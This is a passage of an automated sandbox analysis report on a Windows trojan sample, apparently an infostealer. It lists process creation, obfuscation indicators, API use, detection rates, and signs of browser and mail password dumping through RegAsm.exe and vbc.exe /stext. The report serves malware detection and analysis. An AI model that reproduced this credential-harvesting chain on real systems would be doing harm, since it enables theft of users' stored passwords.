Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933567035.0000000000D1F000.00000004.00000001.sdmp Binary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933303003.0000000000BE3000.00000004.00000001.sdmp Binary or memory string: FV_ORIGINALFILENAME vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000002.933303003.0000000000BE3000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe, 00000001.00000003.697471372.0000000004252000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameReborn Stub.exe" vs SecuriteInfo.com.Trojan.AutoIt.449.29642.exe
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/7@3/2
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.RegAsm.exe.700000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.2.RegAsm.exe.700000.0.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.700000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.1.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.0.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F5A2D5 GetLastError,FormatMessageW, 1_2_00F5A2D5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource, 6_2_004141E0
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Virustotal: Detection: 40%
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Metadefender: Detection: 44%
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp1EB3.tmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp2C9A.tmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp39A1.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp1EB3.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp2C9A.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp39A1.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_07860C02 AdjustTokenPrivileges, 5_2_07860C02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_07860BCB AdjustTokenPrivileges, 5_2_07860BCB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\3e305278-23d3-0e99-471b-29f2d02980fa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 6_2_00418073
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F53E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 1_2_00F53E91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\c7dc0042-85e5-4472-9326-a6e87cc9c990
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static file information: File size 1771008 > 1048576
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F18B85 push ecx; ret 1_2_00F18B98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_00A4912C push ecx; retf 5_2_00A49131
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5C5C7 push ebp; ret 5_2_04B5C5D1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5BE4C push 8BFFFFFFh; retf 5_2_04B5BE5E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52FA5 push ss; retf 5_2_04B52FA6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52F1C push ss; retf 5_2_04B52F1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444975 push ecx; ret 6_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444B90 push eax; ret 6_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444B90 push eax; ret 6_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00448E74 push eax; ret 6_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0042CF44 push ebx; retf 0042h 6_2_0042CF49
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444975 push ecx; ret 9_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444B90 push eax; ret 9_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444B90 push eax; ret 9_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00448E74 push eax; ret 9_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0042CF44 push ebx; retf 0042h 9_2_0042CF49
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444975 push ecx; ret 18_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444B90 push eax; ret 18_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444B90 push eax; ret 18_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00448E74 push eax; ret 18_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0042CF44 push ebx; retf 0042h 18_2_0042CF49
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_004443B0

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00443A61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
